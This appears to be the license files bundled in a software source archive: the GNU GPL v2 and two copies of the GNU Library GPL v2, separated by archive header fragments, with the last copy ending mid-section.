Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users.
This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Lesser General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. 
You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. 
You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. 
If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) year name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. , 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. 
If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. unicorn-2.1.1/COPYING.LGPL2000066400000000000000000000614471467524106700150720ustar00rootroot00000000000000 GNU LIBRARY GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1991 Free Software Foundation, Inc. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. [This is the first released version of the library GPL. It is numbered 2 because it goes with version 2 of the ordinary GPL.] Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public Licenses are intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This license, the Library General Public License, applies to some specially designated Free Software Foundation software, and to any other libraries whose authors decide to use it. You can use it for your libraries, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the library, or if you modify it. For example, if you distribute copies of the library, whether gratis or for a fee, you must give the recipients all the rights that we gave you. You must make sure that they, too, receive or can get the source code. If you link a program with the library, you must provide complete object files to the recipients so that they can relink them with the library, after making changes to the library and recompiling it. And you must show them these terms so they know their rights. Our method of protecting your rights has two steps: (1) copyright the library, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the library. Also, for each distributor's protection, we want to make certain that everyone understands that there is no warranty for this free library. If the library is modified by someone else and passed on, we want its recipients to know that what they have is not the original version, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that companies distributing free software will individually obtain patent licenses, thus in effect transforming the program into proprietary software. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. Most GNU software, including some libraries, is covered by the ordinary GNU General Public License, which was designed for utility programs. 
This license, the GNU Library General Public License, applies to certain designated libraries. This license is quite different from the ordinary one; be sure to read it in full, and don't assume that anything in it is the same as in the ordinary license. The reason we have a separate public license for some libraries is that they blur the distinction we usually make between modifying or adding to a program and simply using it. Linking a program with a library, without changing the library, is in some sense simply using the library, and is analogous to running a utility program or application program. However, in a textual and legal sense, the linked executable is a combined work, a derivative of the original library, and the ordinary General Public License treats it as such. Because of this blurred distinction, using the ordinary General Public License for libraries did not effectively promote software sharing, because most developers did not use the libraries. We concluded that weaker conditions might promote sharing better. However, unrestricted linking of non-free programs would deprive the users of those programs of all benefit from the free status of the libraries themselves. This Library General Public License is intended to permit developers of non-free programs to use free libraries, while preserving your freedom as a user of such programs to change the free libraries that are incorporated in them. (We have not seen how to achieve this as regards changes in header files, but we have achieved it as regards changes in the actual functions of the Library.) The hope is that this will lead to faster development of free libraries. The precise terms and conditions for copying, distribution and modification follow. Pay close attention to the difference between a "work based on the library" and a "work that uses the library". The former contains code derived from the library, while the latter only works together with the library. Note that it is possible for a library to be covered by the ordinary General Public License rather than by this special one. GNU LIBRARY GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License Agreement applies to any software library which contains a notice placed by the copyright holder or other authorized party saying it may be distributed under the terms of this Library General Public License (also called "this License"). Each licensee is addressed as "you". A "library" means a collection of software functions and/or data prepared so as to be conveniently linked with application programs (which use some of those functions and data) to form executables. The "Library", below, refers to any such software library or work which has been distributed under these terms. A "work based on the Library" means either the Library or any derivative work under copyright law: that is to say, a work containing the Library or a portion of it, either verbatim or with modifications and/or translated straightforwardly into another language. (Hereinafter, translation is included without limitation in the term "modification".) "Source code" for a work means the preferred form of the work for making modifications to it. For a library, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the library. 
Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running a program using the Library is not restricted, and output from such a program is covered only if its contents constitute a work based on the Library (independent of the use of the Library in a tool for writing it). Whether that is true depends on what the Library does and what the program that uses the Library does. 1. You may copy and distribute verbatim copies of the Library's complete source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and distribute a copy of this License along with the Library. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Library or any portion of it, thus forming a work based on the Library, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) The modified work must itself be a software library. b) You must cause the files modified to carry prominent notices stating that you changed the files and the date of any change. c) You must cause the whole of the work to be licensed at no charge to all third parties under the terms of this License. d) If a facility in the modified Library refers to a function or a table of data to be supplied by an application program that uses the facility, other than as an argument passed when the facility is invoked, then you must make a good faith effort to ensure that, in the event an application does not supply such function or table, the facility still operates, and performs whatever part of its purpose remains meaningful. (For example, a function in a library to compute square roots has a purpose that is entirely well-defined independent of the application. Therefore, Subsection 2d requires that any application-supplied function or table used by this function must be optional: if the application does not supply it, the square root function must still compute square roots.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Library, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Library, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Library. In addition, mere aggregation of another work not based on the Library with the Library (or with a work based on the Library) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. 
You may opt to apply the terms of the ordinary GNU General Public License instead of this License to a given copy of the Library. To do this, you must alter all the notices that refer to this License, so that they refer to the ordinary GNU General Public License, version 2, instead of to this License. (If a newer version than version 2 of the ordinary GNU General Public License has appeared, then you can specify that version instead if you wish.) Do not make any other change in these notices. Once this change is made in a given copy, it is irreversible for that copy, so the ordinary GNU General Public License applies to all subsequent copies and derivative works made from that copy. This option is useful when you wish to copy part of the code of the Library into a program that is not a library. 4. You may copy and distribute the Library (or a portion or derivative of it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange. If distribution of object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place satisfies the requirement to distribute the source code, even though third parties are not compelled to copy the source along with the object code. 5. A program that contains no derivative of any portion of the Library, but is designed to work with the Library by being compiled or linked with it, is called a "work that uses the Library". Such a work, in isolation, is not a derivative work of the Library, and therefore falls outside the scope of this License. However, linking a "work that uses the Library" with the Library creates an executable that is a derivative of the Library (because it contains portions of the Library), rather than a "work that uses the library". The executable is therefore covered by this License. Section 6 states terms for distribution of such executables. When a "work that uses the Library" uses material from a header file that is part of the Library, the object code for the work may be a derivative work of the Library even though the source code is not. Whether this is true is especially significant if the work can be linked without the Library, or if the work is itself a library. The threshold for this to be true is not precisely defined by law. If such an object file uses only numerical parameters, data structure layouts and accessors, and small macros and small inline functions (ten lines or less in length), then the use of the object file is unrestricted, regardless of whether it is legally a derivative work. (Executables containing this object code plus portions of the Library will still fall under Section 6.) Otherwise, if the work is a derivative of the Library, you may distribute the object code for the work under the terms of Section 6. Any executables containing that work also fall under Section 6, whether or not they are linked directly with the Library itself. 6. 
As an exception to the Sections above, you may also compile or link a "work that uses the Library" with the Library to produce a work containing portions of the Library, and distribute that work under terms of your choice, provided that the terms permit modification of the work for the customer's own use and reverse engineering for debugging such modifications. You must give prominent notice with each copy of the work that the Library is used in it and that the Library and its use are covered by this License. You must supply a copy of this License. If the work during execution displays copyright notices, you must include the copyright notice for the Library among them, as well as a reference directing the user to the copy of this License. Also, you must do one of these things: a) Accompany the work with the complete corresponding machine-readable source code for the Library including whatever changes were used in the work (which must be distributed under Sections 1 and 2 above); and, if the work is an executable linked with the Library, with the complete machine-readable "work that uses the Library", as object code and/or source code, so that the user can modify the Library and then relink to produce a modified executable containing the modified Library. (It is understood that the user who changes the contents of definitions files in the Library will not necessarily be able to recompile the application to use the modified definitions.) b) Accompany the work with a written offer, valid for at least three years, to give the same user the materials specified in Subsection 6a, above, for a charge no more than the cost of performing this distribution. c) If distribution of the work is made by offering access to copy from a designated place, offer equivalent access to copy the above specified materials from the same place. d) Verify that the user has already received a copy of these materials or that you have already sent this user a copy. For an executable, the required form of the "work that uses the Library" must include any data and utility programs needed for reproducing the executable from it. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. It may happen that this requirement contradicts the license restrictions of other proprietary libraries that do not normally accompany the operating system. Such a contradiction means you cannot use both them and the Library together in an executable that you distribute. 7. You may place library facilities that are a work based on the Library side-by-side in a single library together with other library facilities not covered by this License, and distribute such a combined library, provided that the separate distribution of the work based on the Library and of the other library facilities is otherwise permitted, and provided that you do these two things: a) Accompany the combined library with a copy of the same work based on the Library, uncombined with any other library facilities. This must be distributed under the terms of the Sections above. b) Give prominent notice with the combined library of the fact that part of it is a work based on the Library, and explaining where to find the accompanying uncombined form of the same work. 8. 
You may not copy, modify, sublicense, link with, or distribute the Library except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense, link with, or distribute the Library is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 9. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Library or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Library (or any work based on the Library), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Library or works based on it. 10. Each time you redistribute the Library (or any work based on the Library), the recipient automatically receives a license from the original licensor to copy, distribute, link with or modify the Library subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 11. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Library at all. For example, if a patent license would not permit royalty-free redistribution of the Library by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Library. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply, and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 12. If the distribution and/or use of the Library is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Library under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. 
In such case, this License incorporates the limitation as if written in the body of this License. 13. The Free Software Foundation may publish revised and/or new versions of the Library General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Library specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Library does not specify a license version number, you may choose any version ever published by the Free Software Foundation. 14. If you wish to incorporate parts of the Library into other free programs whose distribution conditions are incompatible with these, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Libraries If you develop a new library, and you want it to be of the greatest possible use to the public, we recommend making it free software that everyone can redistribute and change. You can do so by permitting redistribution under these terms (or, alternatively, under the terms of the ordinary General Public License). To apply these terms, attach the following notices to the library. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. <one line to give the library's name and a brief idea of what it does.> Copyright (C) <year> <name of author> This library is free software; you can redistribute it and/or modify it under the terms of the GNU Library General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Library General Public License for more details. You should have received a copy of the GNU Library General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Also add information on how to contact you by electronic and paper mail. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the library, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the library `Frob' (a library for tweaking knobs) written by James Random Hacker. <signature of Ty Coon>, 1 April 1990 Ty Coon, President of Vice That's all there is to it! unicorn-2.1.1/COPYING_GLIB000066400000000000000000000613141467524106700150410ustar00rootroot00000000000000 GNU LIBRARY GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1991 Free Software Foundation, Inc. 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. [This is the first released version of the library GPL. It is numbered 2 because it goes with version 2 of the ordinary GPL.] Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public Licenses are intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This license, the Library General Public License, applies to some specially designated Free Software Foundation software, and to any other libraries whose authors decide to use it. You can use it for your libraries, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the library, or if you modify it. For example, if you distribute copies of the library, whether gratis or for a fee, you must give the recipients all the rights that we gave you. You must make sure that they, too, receive or can get the source code. If you link a program with the library, you must provide complete object files to the recipients so that they can relink them with the library, after making changes to the library and recompiling it. And you must show them these terms so they know their rights. Our method of protecting your rights has two steps: (1) copyright the library, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the library. Also, for each distributor's protection, we want to make certain that everyone understands that there is no warranty for this free library.
If the library is modified by someone else and passed on, we want its recipients to know that what they have is not the original version, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that companies distributing free software will individually obtain patent licenses, thus in effect transforming the program into proprietary software. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. Most GNU software, including some libraries, is covered by the ordinary GNU General Public License, which was designed for utility programs. This license, the GNU Library General Public License, applies to certain designated libraries. This license is quite different from the ordinary one; be sure to read it in full, and don't assume that anything in it is the same as in the ordinary license. The reason we have a separate public license for some libraries is that they blur the distinction we usually make between modifying or adding to a program and simply using it. Linking a program with a library, without changing the library, is in some sense simply using the library, and is analogous to running a utility program or application program. However, in a textual and legal sense, the linked executable is a combined work, a derivative of the original library, and the ordinary General Public License treats it as such. Because of this blurred distinction, using the ordinary General Public License for libraries did not effectively promote software sharing, because most developers did not use the libraries. We concluded that weaker conditions might promote sharing better. However, unrestricted linking of non-free programs would deprive the users of those programs of all benefit from the free status of the libraries themselves. This Library General Public License is intended to permit developers of non-free programs to use free libraries, while preserving your freedom as a user of such programs to change the free libraries that are incorporated in them. (We have not seen how to achieve this as regards changes in header files, but we have achieved it as regards changes in the actual functions of the Library.) The hope is that this will lead to faster development of free libraries. The precise terms and conditions for copying, distribution and modification follow. Pay close attention to the difference between a "work based on the library" and a "work that uses the library". The former contains code derived from the library, while the latter only works together with the library. Note that it is possible for a library to be covered by the ordinary General Public License rather than by this special one. GNU LIBRARY GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License Agreement applies to any software library which contains a notice placed by the copyright holder or other authorized party saying it may be distributed under the terms of this Library General Public License (also called "this License"). Each licensee is addressed as "you". A "library" means a collection of software functions and/or data prepared so as to be conveniently linked with application programs (which use some of those functions and data) to form executables. The "Library", below, refers to any such software library or work which has been distributed under these terms. 
A "work based on the Library" means either the Library or any derivative work under copyright law: that is to say, a work containing the Library or a portion of it, either verbatim or with modifications and/or translated straightforwardly into another language. (Hereinafter, translation is included without limitation in the term "modification".) "Source code" for a work means the preferred form of the work for making modifications to it. For a library, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the library. Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running a program using the Library is not restricted, and output from such a program is covered only if its contents constitute a work based on the Library (independent of the use of the Library in a tool for writing it). Whether that is true depends on what the Library does and what the program that uses the Library does. 1. You may copy and distribute verbatim copies of the Library's complete source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and distribute a copy of this License along with the Library. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Library or any portion of it, thus forming a work based on the Library, and copy and distribute such modifications or work under the terms of Section 1 above, provided 